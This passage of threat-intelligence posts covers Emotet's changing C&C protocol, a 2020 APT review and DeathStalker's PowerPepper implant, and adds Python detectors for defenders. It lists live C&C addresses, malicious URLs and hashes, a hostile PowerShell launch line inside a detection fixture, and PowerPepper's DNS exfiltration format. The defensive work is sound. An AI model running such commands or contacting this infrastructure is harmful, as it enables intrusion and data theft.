A minor change to the HTTP part of the protocol. Emotet dropped the use of a dictionary to create the path, opting for a randomly generated string (MD5: dd33b9e4f928974c72539cd784ce9d20).

Example of a POST request

2020

February

February 6

Yet another change in the HTTP part of the protocol. The path now consisted not of a single string, but of several randomly generated words. Content-Type again became multipart/form-data.

Example of a POST request

Along with the HTTP part, the binary part was also updated. The encryption remained the same, but Emotet dropped Google Protocol Buffer and switched to its own format. The compression algorithm also changed, with zlib replaced by liblzf. More details about the new protocol can be found in the Threat Intel and CERT Polska reports.
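The HTTP side of the C&C protocol changed several times over the timeline: data smuggled in a Cookie header on GET requests (December 2016), the Cookie: %u = template with a space (April 2018), POST with a dictionary-word path, a filled Referer and multipart/form-data (March 14, 2019), Base64 plus URL-encoded bodies without multipart (March 20, 2019), a single random path token (November 2019) and several random words with multipart again (February 2020). The following is an added example written for this summary, not code from the article or from any Kaspersky product: it parses raw HTTP messages and reports which of those traits a request shows, plus the 404-with-payload response behaviour noted for the 2016 version. All sample requests are constructed (RFC 5737 addresses, invented paths); the Base64 and path checks are heuristics chosen here, and path shape alone does not separate the 2019 and 2020 POST variants.

```python
import base64
import re
from urllib.parse import quote, unquote

# Cookie name templates from the timeline: "%X=" (hex, 2016-2017) and "%u ="
# (decimal followed by a space, April 2018). The value is the encrypted,
# base64-encoded request.
COOKIE_RE = re.compile(r"^([0-9A-Fa-f]+)( ?)=(\S+)$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def parse_http(raw):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers, body


def request_traits(raw):
    """Return the set of Emotet-style C&C traits a request exhibits."""
    start, headers, body = parse_http(raw)
    method, path, _ = start.split(" ", 2)
    segments = [s for s in path.split("/") if s]
    traits = set()
    if method == "GET":
        m = COOKIE_RE.match(headers.get("cookie", ""))
        if m and B64_RE.match(m.group(3)):
            traits.add("data-in-cookie")      # Dec 2016 / Apr 2018 variants
            if m.group(2):
                traits.add("cookie-space")    # the "%u =" template
    elif method == "POST":
        if headers.get("content-type", "").startswith("multipart/form-data"):
            traits.add("multipart-post")      # Mar 14 2019 and Feb 2020 variants
        elif B64_RE.match(unquote(body.partition("=")[2]).strip()):
            traits.add("base64-urlencoded-body")  # Mar 20 2019 / Nov 2019 variants
        if "referer" in headers:
            traits.add("referer-set")
        if segments and all(s.isalpha() for s in segments):
            traits.add("word-path")           # dictionary or random-word path
        elif len(segments) == 1 and segments[0].isalnum():
            traits.add("single-token-path")   # Nov 2019 random string
    return traits


def response_traits(raw):
    """Flag a 404 response that nonetheless carries a payload-sized, non-HTML body."""
    start, _, body = parse_http(raw)
    status = start.split(" ")[1]
    traits = set()
    if status == "404" and len(body) >= 64 and "<html" not in body.lower():
        traits.add("404-with-payload")
    return traits


def is_emotet_like(traits):
    """Verdict heuristic: cookie smuggling alone is strong; POST variants need
    an encoding marker, a path marker and the Referer field together."""
    if "data-in-cookie" in traits:
        return True
    return (bool(traits & {"multipart-post", "base64-urlencoded-body"})
            and bool(traits & {"word-path", "single-token-path"})
            and "referer-set" in traits)


# Constructed samples, not captures from the article or from real traffic.
ENC = base64.b64encode(bytes(range(48))).decode()   # stand-in for an encrypted message
SAMPLES = {
    "get_2017": "GET /ZeyCGzgmt/ HTTP/1.1\r\nHost: 203.0.113.10\r\nCookie: 1A4F=" + ENC + "\r\n\r\n",
    "get_apr2018": "GET /a/ HTTP/1.1\r\nHost: 203.0.113.10\r\nCookie: 4294 =" + ENC + "\r\n\r\n",
    "post_mar2019": ("POST /report/schema/ HTTP/1.1\r\nHost: 203.0.113.10\r\n"
                     "Referer: http://203.0.113.10/report/schema/\r\n"
                     "Content-Type: multipart/form-data; boundary=----abc\r\n\r\n"
                     "------abc\r\n" + ENC + "\r\n------abc--\r\n"),
    "post_nov2019": ("POST /hdt2kwfp/ HTTP/1.1\r\nHost: 203.0.113.10\r\n"
                     "Referer: http://203.0.113.10/hdt2kwfp/\r\n"
                     "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                     "HdTk=" + quote(ENC, safe="") + "\r\n"),
    "benign": "GET /index.html HTTP/1.1\r\nHost: example.com\r\nCookie: session=abc123\r\n\r\n",
}
RESP_404 = "HTTP/1.1 404 Not Found\r\nServer: nginx\r\nContent-Length: 64\r\n\r\n" + ENC


def classify_all():
    """Traits and verdict for every constructed sample, keyed by sample name."""
    return {name: (sorted(request_traits(raw)), is_emotet_like(request_traits(raw)))
            for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in classify_all().items():
        print(name, result)
    print("response:", response_traits(RESP_404))
```

Traits rather than a single verdict are reported on purpose: a legitimate site can serve a word-only path or a multipart form, so a rule should combine traits (and ideally the destination's reputation) before alerting, while a hex-named cookie carrying a long Base64 blob on a GET is distinctive enough on its own.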

February 7

C&C activity started to decline and resumed only in July 2020. During this period, the amount of spam fell to zero. At the same time, Binary Defense, in conjunction with various CERTs and the infosec community, began to distribute EmoCrash, a PowerShell script that creates incorrect values for system registry keys used by Emotet. This caused the malware to “crash” during installation. This killswitch worked until August 6, when the actors behind Emotet patched the vulnerability.

July

Only a few days after the resumption of spam activity, online reports appeared that someone was substituting the malicious Emotet payload on compromised sites with images and memes. As a result, clicking the links in spam emails opened an ordinary picture instead of a malicious document. This did not last long, and by July 28 the malicious files had stopped being replaced with images.

Conclusion

Despite its ripe old age, Emotet is constantly evolving and remains one of the most current threats out there. Save for the explosive growth in distribution after five months of inactivity, we have yet to see anything previously unobserved; that said, a detailed analysis always takes time, and we will publish the results of the study in due course. On top of that, we are currently observing the evolution of third-party malware that propagates using Emotet, which we will certainly cover in future reports.

Our security solutions can block Emotet at any stage of attack. The mail filter blocks spam, the heuristic component detects malicious macros and removes them from Office documents, while the behavioral analysis module makes our protection system resistant not only to statistical analysis bypass techniques, but to new modifications of program behavior as well.

To mitigate the risks, it is vital to receive accurate, reliable, before-the-fact information about all information security matters. Scanning IP addresses, file hashes and domains/URLs on opentip can determine if an object poses a genuine threat based on risk levels and additional contextual information. Analyzing files with opentip, using our proprietary technologies, including dynamic, statistical and behavioral analysis, as well as our global reputation system, can help detect advanced mass and latent threats.

And Kaspersky Threat Intelligence is there to track constantly evolving cyberthreats, analyze them, respond to attacks in good time, and minimize the consequences.

IOC

Most active C&Cs in November 2020:

173.212.214.235:7080
167.114.153.111:8080
67.170.250.203:443
121.124.124.40:7080
103.86.49.11:8080
172.91.208.86:80
190.164.104.62:80
201.241.127.190:80
66.76.12.94:8080
190.108.228.27:443

Links to Emotet extracted from malicious documents

hxxp://tudorinvest[.]com/wp-admin/rGtnUb5f/
hxxp://dp-womenbasket[.]com/wp-admin/Li/
hxxp://stylefix[.]co/guillotine-cross/CTRNOQ/
hxxp://ardos.com[.]br/simulador/bPNx/
hxxps://sangbadjamin[.]com/move/r/
hxxps://asimglobaltraders[.]com/baby-rottweiler/duDm64O/
hxxp://sell.smartcrowd[.]ae/wp-admin/CLs6YFp/
hxxps://chromadiverse[.]com/wp-content/OzOlf/
hxxp://rout66motors[.]com/wp-admin/goi7o8/
hxxp://caspertour.asc-florida[.]com/wp-content/gwZbk/

MD5s of malicious Office documents downloading Emotet

59d7ae5463d9d2e1d9e77c94a435a786
7ef93883eac9bf82574ff2a75d04a585
4b393783be7816e76d6ca4b4d8eaa14a

MD5s of Emotet executable files

4c3b6e5b52268bb463e8ebc602593d9e
0ca86e8da55f4176b3ad6692c9949ba4
8d4639aa32f78947ecfb228e1788c02b
28df8461cec000e86c357fdd874b717e
82228264794a033c2e2fc71540cb1a5d
8fc87187ad08d50221abc4c05d7d0258
b30dd0b88c0d10cd96913a7fb9cd05ed
c37c5b64b30f2ddae58b262f2fac87cb
3afb20b335521c871179b230f9a0a1eb
92816647c1d61c75ec3dcd82fecc08b2
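The indicators above are published defanged (hxxp, [.]) so they cannot be clicked by accident; to use them in a proxy or EDR search they have to be refanged and matched by exact URL, by host, and by destination socket. The following is an added example written for this summary, not a Kaspersky tool: it takes the article's own C&C list, document URLs and MD5s, and runs them over a few constructed proxy log lines (RFC 5737 client and resolver addresses, invented timestamps). The log line format is an assumption made for the example.

```python
from urllib.parse import urlsplit

# Indicators copied from the lists above, kept in the article's defanged form.
C2_ENDPOINTS = [
    "173.212.214.235:7080", "167.114.153.111:8080", "67.170.250.203:443",
    "121.124.124.40:7080", "103.86.49.11:8080", "172.91.208.86:80",
    "190.164.104.62:80", "201.241.127.190:80", "66.76.12.94:8080",
    "190.108.228.27:443",
]
DEFANGED_URLS = [
    "hxxp://tudorinvest[.]com/wp-admin/rGtnUb5f/",
    "hxxp://dp-womenbasket[.]com/wp-admin/Li/",
    "hxxp://stylefix[.]co/guillotine-cross/CTRNOQ/",
    "hxxp://ardos.com[.]br/simulador/bPNx/",
    "hxxps://sangbadjamin[.]com/move/r/",
    "hxxps://asimglobaltraders[.]com/baby-rottweiler/duDm64O/",
    "hxxp://sell.smartcrowd[.]ae/wp-admin/CLs6YFp/",
    "hxxps://chromadiverse[.]com/wp-content/OzOlf/",
    "hxxp://rout66motors[.]com/wp-admin/goi7o8/",
    "hxxp://caspertour.asc-florida[.]com/wp-content/gwZbk/",
]
DOC_MD5S = {
    "59d7ae5463d9d2e1d9e77c94a435a786", "7ef93883eac9bf82574ff2a75d04a585",
    "4b393783be7816e76d6ca4b4d8eaa14a",
}
EXE_MD5S = {
    "4c3b6e5b52268bb463e8ebc602593d9e", "0ca86e8da55f4176b3ad6692c9949ba4",
    "8d4639aa32f78947ecfb228e1788c02b", "28df8461cec000e86c357fdd874b717e",
    "82228264794a033c2e2fc71540cb1a5d", "8fc87187ad08d50221abc4c05d7d0258",
    "b30dd0b88c0d10cd96913a7fb9cd05ed", "c37c5b64b30f2ddae58b262f2fac87cb",
    "3afb20b335521c871179b230f9a0a1eb", "92816647c1d61c75ec3dcd82fecc08b2",
}


def refang(ioc):
    """Turn hxxp(s)://host[.]tld back into a usable URL for matching."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")


def build_ioc_set(c2_endpoints, defanged_urls):
    """Index the indicators so each log line can be matched in O(1)."""
    urls = {refang(u) for u in defanged_urls}
    return {
        "sockets": set(c2_endpoints),
        "ips": {e.split(":")[0] for e in c2_endpoints},
        "urls": urls,
        "hosts": {urlsplit(u).hostname for u in urls},
    }


# Constructed proxy log lines (assumed format):
# "<timestamp> <client_ip> <method> <url> <dst_ip>:<dst_port> <status>"
SAMPLE_PROXY_LOG = [
    "2020-11-05T09:12:01Z 192.0.2.15 GET http://tudorinvest.com/wp-admin/rGtnUb5f/ 198.51.100.7:80 200",
    "2020-11-05T09:12:44Z 192.0.2.15 POST http://173.212.214.235:7080/uhfwa/ 173.212.214.235:7080 404",
    "2020-11-05T09:13:10Z 192.0.2.22 GET http://example.com/ 198.51.100.9:80 200",
    "2020-11-05T09:14:02Z 192.0.2.31 GET https://sangbadjamin.com/other/path/ 198.51.100.11:443 200",
]


def match_proxy_log(lines, iocs):
    """Return (timestamp, client, reasons) for each line touching an indicator.
    Exact URL and exact socket matches are reported ahead of the weaker
    host-only and IP-only matches, so the analyst sees the strongest evidence."""
    hits = []
    for line in lines:
        ts, client, _method, url, dst, _status = line.split()
        reasons = []
        if url in iocs["urls"]:
            reasons.append("maldoc-url")
        elif urlsplit(url).hostname in iocs["hosts"]:
            reasons.append("maldoc-host")
        if dst in iocs["sockets"]:
            reasons.append("c2-socket")
        elif dst.split(":")[0] in iocs["ips"]:
            reasons.append("c2-ip")
        if reasons:
            hits.append((ts, client, reasons))
    return hits


def match_hashes(observed_md5s):
    """Label observed file hashes as Emotet document or executable hits."""
    return {h: ("maldoc" if h in DOC_MD5S else "emotet-exe")
            for h in observed_md5s if h in DOC_MD5S or h in EXE_MD5S}


if __name__ == "__main__":
    iocs = build_ioc_set(C2_ENDPOINTS, DEFANGED_URLS)
    for hit in match_proxy_log(SAMPLE_PROXY_LOG, iocs):
        print(hit)
    print(match_hashes(["59d7ae5463d9d2e1d9e77c94a435a786", "d41d8cd98f00b204e9800998ecf8427e"]))
```

The host-only match on the fourth line is deliberately weaker than the exact-URL match on the first: the listed sites are compromised legitimate domains, so a different path on the same host is worth a look but is not proof of infection, whereas the 404 reply from a listed C&C socket matches the response behaviour described in the timeline.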

December 3, 2020

APT annual review: What the world’s threat actors got up to in 2020

We track the ongoing activities of more than 900 advanced threat actors; you can find our quarterly overviews here, here and here. Here we try to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility in the threat landscape; and it’s important to note that no single vendor has complete visibility into the activities of all threat actors.

Beyond Windows

While Windows continues to be the main focus for APT threat actors, we have observed a number of non-Windows developments this year. Last year we reported a malware framework called MATA that we attribute to Lazarus. This framework included several components such as a loader, orchestrator and plug-ins. In April, we learned that MATA extended beyond Windows and Linux to include macOS. The malware developers Trojanized an open-source two-factor authentication application and utilized another open-source application template. The MATA framework was not the only way that Lazarus targeted macOS. We found a cluster of activity linked to Operation AppleJeus. We also discovered malware similar to the macOS malware used in a campaign that we call TangDaiwbo – a multi-platform cryptocurrency exchange campaign. Lazarus utilizes macro-embedded Office documents and spreads PowerShell or macOS malware, depending on the victim’s system.

Kaspersky has publicly documented the Penquin family, tracing it back to its Unix ancestors in the Moonlight Maze operation of the 1990s. When researchers at Leonardo published a report in May about Penquin_x64, a previously undocumented variant of Turla’s Penquin GNU/Linux backdoor, we followed up on this research by generating network probes that detect Penquin_x64-infected hosts at scale, which allowed us to discover that dozens of internet hosting servers in Europe and the US are still compromised today. We think it possible that, following public disclosure of Turla’s GNU/Linux tools, the Turla threat actor has been repurposing Penquin to conduct operations other than traditional intelligence gathering.

In our 2020 Q3 APT trends report we described a campaign we dubbed TunnelSnake. By analyzing the activity in this campaign, we were able to uncover the network discovery and lateral movement toolset used by the threat actor after deploying the Moriya rootkit. We saw that the actor also made use of the open-source tools Earthworm and Termite, capable of spawning a remote shell and tunneling traffic between hosts. These tools are capable of operating on multiple architectures widely used by IoT devices, demonstrating a readiness to pivot to such devices.

Infecting UEFI firmware

During an investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware was a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and that have different infection vectors. While the business logic of most of them is identical, we saw that some had additional features or differed in their implementation. Because of this, we infer that the bulk of samples originate from a bigger framework, which we dubbed MosaicRegressor. The targets, diplomatic entities and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.

Mobile implants

The use of mobile implants by APT threat actors is no longer a novelty: this year we have observed various groups targeting mobile platforms.

In January, we discovered a watering hole utilizing a full remote iOS exploit chain. The site appears to have been designed to target users in Hong Kong, based on the content of the landing page. While the exploits currently being used are known, the actor responsible is actively modifying the exploit kit to target more iOS versions and devices. We observed the latest modifications on February 7. The project is broader than we initially thought, supporting an Android implant, and probably implants for Windows, Linux and macOS. We have named this APT group TwoSail Junk. We believe this is a Chinese-speaking group; it maintains infrastructure mostly within Hong Kong, along with a couple of hosts located in Singapore and Shanghai. TwoSail Junk directs visitors to its exploit site by posting links within the threads of forum discussions, or creating new topic threads of their own. To date, dozens of visits were recorded from within Hong Kong, with a couple from Macau. The technical details around the functionality of the iOS implant, called LightSpy, and related infrastructure, reveal a low-to-mid capable actor. However, the iOS implant is a modular and exhaustively functional iOS surveillance framework.

In August, we published the second of our reports on the recent activities of the Transparent Tribe threat actor. This included an Android implant used by the group to spy on mobile devices. One of the methods used to distribute the app was by disguising it as the Aarogya Setu COVID-19 tracking app developed by the government of India. The fake app was used to target military personnel in India; and, based on public information, may have been distributed by sending a malicious link via WhatsApp, SMS, email or social media.

In June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019, and have been used in a campaign targeting victims almost exclusively in Pakistan. The authors spread the malware by mimicking Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to the publication, the targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.

Big game hunting

In April, we released an early warning about the VHD ransomware, which was first spotted in late March. This ransomware stood out because of its self-replication method. The use of a spreading utility compiled with victim-specific credentials was reminiscent of APT campaigns, but at the time we were unable to link the attack to an existing group. However, we were able to identify an incident in which the VHD ransomware was deployed, in close conjunction with known Lazarus tools, against businesses in France and Asia. This indicates that Lazarus is behind the VHD ransomware campaigns that have been documented so far. As far as we know, this is the first time it has been established that the Lazarus group has resorted to targeted ransomware attacks (known as “big game hunting”) for financial gain.

Continued use of ‘naming and shaming’

Some years ago, we predicted that governments would resort to the “court of public opinion” as a strategy to draw attention to the activities of hostile APT groups; and this trend has developed further in the last year or so.

In February, the US Department of Justice (DoJ) charged four Chinese military officers with computer fraud, economic espionage and wire fraud for hacking into the credit reporting agency Equifax in 2017. The following month, the DoJ charged two Chinese nationals with laundering more than $100 million in cryptocurrency on behalf of North Korea. The indictment alleged that the two men laundered cryptocurrency stolen by North Korean hackers between December 2017 and April 2019, helping to hide the stolen currency from police.

In May, the UK National Cyber Security Centre (NCSC) and the US Department of Homeland Security (DHS) issued a joint advisory warning that both countries are investigating a number of incidents in which other nation states are targeting pharmaceutical companies, medical research organizations and universities, looking for intelligence and sensitive data, including research on COVID-19. The FBI and CISA (Cybersecurity and Infrastructure Security Agency) also issued a warning that threat actors related to the People’s Republic of China have been targeting US organizations engaged in COVID-19-related research.

On July 30, the European Council announced that it was imposing sanctions against six individuals and three entities that it believes are responsible for, or involved in, various cyberattacks, including the attempted attack on the Organisation for the Prohibition of Chemical Weapons (OPCW) and the WannaCry, NotPetya and Operation Cloud Hopper attacks. The sanctions include a travel ban and asset freeze. In addition, EU persons and entities are forbidden from making funds available to those listed.

In September, the US DoJ released three indictments associated with hackers allegedly connected with APT41 and other intrusions tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for “conspiring to profit from computer intrusions targeting the video game industry”, following cooperation between the US DoJ and Government of Malaysia, including the Attorney General’s Chambers of Malaysia and the Royal Malaysia Police. The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks that we discovered and investigated.

In October, the US DoJ indicted six Russian military intelligence officers for a number of cyberattacks, including NotPetya, the Olympic Destroyer attacks on the 2018 Winter Olympics and attacks affecting France, Georgia, the Netherlands, Ukraine and the investigation into the 2018 Novichok poisonings in the UK. The UK NCSC also accused Russia’s GRU military intelligence service of attacks on officials and organizations involved in the 2020 Tokyo games, prior to their postponement.

‘Good enough’ is enough

The malware developed by APT threat actors doesn’t always need to be technically sophisticated in order to be effective. The activities of DeathStalker illustrate this. This is a unique threat actor that seems to focus mainly on law firms and companies operating in the financial sector. The group’s interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. Earlier this year, we unraveled the threads of DeathStalker’s LNK-based Powersing intrusion workflow. The group continues to develop and use this implant, employing tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our public report on DeathStalker’s activities summarized the three scripting-language-based toolchains used by the group: Powersing, Janicab and Evilnum.

Following our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn’t limit themselves merely to sending spear-phishing emails, but actively engaged victims through multiple emails, persuading them to open the decoy to increase the chances of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.

We also found another intricate, low-tech implant used since Q2 2020 that we attribute with high confidence to DeathStalker. The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper. In October 2020, we identified new samples of DeathStalker’s PowerPepper toolset, containing improvements that included improved sandbox detection techniques. The group also leveraged a new infection chain to deliver PowerPepper.

DeathStalker offers a good example of what small groups or even skilled individuals can achieve, without the need for innovative tricks or sophisticated methods. DeathStalker should serve as a baseline of what organizations in the private sector should be able to defend against, since groups of this sort represent the type of cyberthreat that companies today are most likely to face. We advise defenders to pay close attention to any process creation related to native Windows interpreters for scripting languages, such as powershell.exe and cscript.exe: wherever possible, these utilities should be made unavailable. Security awareness training and security product assessments should also include infection chains based on LNK files.
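As an added example (not Kaspersky’s code, and not part of the original report), the Python below scans constructed Sysmon-style process-creation records for the pattern the advice above describes: a native script interpreter spawned by an Office application, or launched with arguments typical of LNK- and macro-based chains (hidden window, execution-policy bypass, encoded command, a shortcut or script file on the command line). The record schema, the file paths and the command lines are assumptions made for this example; real input would be Sysmon Event ID 1 or Windows Security Event 4688 with command-line logging enabled.

```python
"""Flag script-interpreter process creations of the kind LNK/Office delivery
chains produce. Added example, not Kaspersky code. Input records are a
constructed, assumed schema (parent image, image, command line)."""
import os
import re

# Native Windows script interpreters the article recommends watching (or removing).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe", "mshta.exe"}

# Parents that should not normally spawn a script interpreter on a workstation.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Argument patterns common to hidden, policy-bypassing or file-driven launches.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc\w*\s|-e\s+[A-Za-z0-9+/=]{20,}|-w(indowstyle)?\s+hidden|-ep\s+bypass|"
    r"-executionpolicy\s+bypass|-nop\b|\.lnk\b|\.vbs\b|\.js\b)",
    re.IGNORECASE,
)

# Constructed records (assumed schema), not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -nop -c \"iex (gc "
                "'C:\\Users\\u\\Downloads\\invoice.lnk' | select -skip 30)\""},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": "cscript.exe //E:vbscript C:\\Users\\u\\AppData\\Local\\Temp\\stage.vbs"},
    {"parent": r"C:\Windows\System32\svchost.exe",  # scheduled admin task, benign
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\ProgramData\\Inventory\\collect.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": "firefox.exe"},
]


def _basename(win_path):
    # os.path.basename does not split on backslashes on non-Windows hosts.
    return os.path.basename(win_path.replace("\\", "/")).lower()


def analyze(event):
    """Return a finding dict for a suspicious interpreter launch, else None."""
    image = _basename(event["image"])
    if image not in INTERPRETERS:
        return None
    parent = _basename(event["parent"])
    reasons = []
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by Office application {parent}")
    matches = SUSPICIOUS_ARGS.findall(event["cmdline"])
    if matches:
        # findall returns tuples because the regex has two groups; group 0 is the hit.
        hits = sorted({m[0].strip().lower() for m in matches})
        reasons.append("suspicious arguments: " + ", ".join(hits))
    if not reasons:
        return None
    return {"image": image, "parent": parent, "reasons": reasons}


def scan(events):
    """Run analyze() over a batch of records and keep the findings."""
    return [finding for finding in (analyze(e) for e in events) if finding]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["parent"], "->", f["image"], "|", "; ".join(f["reasons"]))
```

Where the interpreters cannot be removed, the same binary list is what an AppLocker or WDAC deny rule would target, and this detection then covers the residual cases. The parent and argument heuristics will also fire on some legitimate administration, so tune SUSPICIOUS_PARENTS and the argument regex to the environment before alerting on them.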

Exploiting COVID-19

In the wake of the COVID-19 pandemic, and the lockdowns imposed by many countries in response, attackers of all kinds sought to capitalize on people’s fears about the disease. Most of the phishing scams related to COVID-19 have been launched by cybercriminals using the disease as a springboard to make money. However, the list of attackers also includes APT threat actors such as Lazarus, Sidewinder, Transparent Tribe, GroupA21, which we observed using COVID-19-themed lures to target their victims, as well as Kimsuky, APT27, IronHusky and ViciousPanda who did the same, according to OSINT (open source intelligence). In March, we discovered a suspicious infrastructure that could have been used to target health and humanitarian organizations, including the WHO. We weren’t able to firmly attribute this to any specific actor, and it was registered before the COVID-19 crisis. Some private sources suggested it might be related to DarkHotel.

A few months later, there were a series of attacks on supercomputing centers around Europe, including the UK-based ARCHER, the German-based bwHPC and the Swiss National Supercomputing Centre. The EGI Computer Security and Incident Response Team (EGI-CSIRT) also published an alert in May covering two incidents that, according to its report, may or may not be related. Although we weren’t able to establish with a high degree of certainty that the ARCHER hack and the incidents described by EGI-CSIRT are related, we suspect they might be. Some media speculated that all these attacks might be related to COVID-19 research being carried out at the supercomputing centers.

Following publication of our initial report on WellMess (see our APT trends report Q2 2020), the UK National Cyber Security Centre (NCSC) released a joint advisory, along with the Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware against COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). While the publication of the NCSC advisory increased general public awareness of the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we still assess that the WellMess activity has been conducted by a previously unknown threat actor.

We do not believe that the interest of APT threat actors in COVID-19 represents a meaningful change in terms of TTPs (Tactics Techniques and Procedures): they’re simply using it as a newsworthy topic to lure their victims.

Final thoughts

We will continue to track the activities of APT threat actors and will regularly highlight the most interesting findings. However, if you wish to learn more about what the world’s most sophisticated threat groups get up to, please reach out to us at intelreports@kaspersky.com.

3 December 2020

What did DeathStalker hide between two ferns?

DeathStalker is a threat actor that has been active since at least 2012. We exposed most of its past activities in a previous article, as well as at the GReAT Ideas conference in August 2020. The actor drew our attention in 2018 because of distinctive attack characteristics that fit neither the usual cybercrime nor state-sponsored activity, leading us to believe that DeathStalker is a “hack-for-hire” company.

DeathStalker has leveraged several malware strains and delivery chains over the years, from the Python- and VisualBasic-based Janicab to the PowerShell-based Powersing, by way of the JavaScript-based Evilnum. The actor has consistently used what we call “dead-drop resolvers” (DDRs): obfuscated content hosted on major public web services such as YouTube, Twitter or Reddit which, once decoded by the malware, reveals a command-and-control (C2) server address. DeathStalker has also consistently leveraged anti-detection and antivirus evasion techniques, as well as intricate delivery chains that drop many files on the target’s filesystem. To kick-start an infection, DeathStalker usually relies on spear-phishing emails with attachments or links to public file-sharing services, as well as script execution through Windows shortcut (LNK) files. We have identified DeathStalker compromises in clusters of varied targets in all parts of the world, with a possible focus on law and consultancy offices as well as fintech companies, but without any clear or stable visible interest. The targeting does not appear to be politically or strategically defined and does not fit the usual pattern of financially motivated crime. We therefore concluded that DeathStalker is a cyber-mercenary organization.

While tracking DeathStalker’s Powersing-based activities in May 2020, we detected a previously unknown implant that leveraged DNS over HTTPS (DoH) as a C2 channel, as well as parts of its delivery chain. We named this new malware “PowerPepper”. We first spotted a PowerPepper variant in the wild in mid-July 2020, dropped by a Word document that had been submitted to a public multiscanner service. The PowerPepper implant and its associated delivery chain have been continuously developed and operated since.

Meet PowerPepper: the spicy implant that your bland scripts setup needed

PowerPepper implant

PowerPepper is a Windows in-memory PowerShell backdoor that can execute remotely sent shell commands. In strict accordance with DeathStalker’s traditions, the implant tries to evade detection with various tricks, such as mouse movement detection, client MAC address filtering, Excel application handling and antivirus product inventory.

The implant’s C2 logic stands out, as it is based on communications via DNS over HTTPS (DoH), using Cloudflare responders. PowerPepper first tries to leverage Microsoft Excel as a web client to send DoH requests to a C2 server, but falls back to PowerShell’s standard web client, and ultimately to regular DNS communications, if messages cannot get through.

C2 communications between the implant and servers are encrypted. We noticed that PowerPepper and the previously described Powersing use an almost identical PowerShell implementation of AES encryption, with only the AES padding mode and a function input format changed.

PowerPepper DNS command and control

PowerPepper regularly polls a C2 server for commands to execute. To do so, the implant sends TXT-type DNS requests (over DoH, falling back to plain DNS if that fails) to the name servers (NS) associated with a malicious C2 domain name. If the target running the implant is validated (we cover that later), the server replies with a DNS response embedding an encrypted command. Both requests and responses contain patterns that can easily be detected with network intrusion detection systems, but these patterns have changed across implant variants.

The command execution results are sent back to the server through a batch of variable-length A-type DNS requests, where the queried hostnames contain an identifier, a data length and encrypted data.

# Command result feedback initialization DNS request hostname:
<identifier>.be.0.0.1.0.0.0.0.<domain>

# Command result feedback data slices DNS request hostnames:
<identifier>.ef.1.0.1.3.BDA2ADBE3C79C9EF6630.DDD4B8D4504FEC348C9C.2F53BFB60C1890585CF7.<domain>
<identifier>.ef.2.0.1.3.72DE8DDB802C4829B2DE.40CB7163E83DE0B4A002.6B6C2E555A931721A525.<domain>
<identifier>.ef.3.0.1.2.1699380DBABAB113D32B.7869501E5FEDD524304B.0.<domain>

# Command result feedback termination DNS request hostname:
<identifier>.ca.4.0.1.00.0.0.0.<domain>
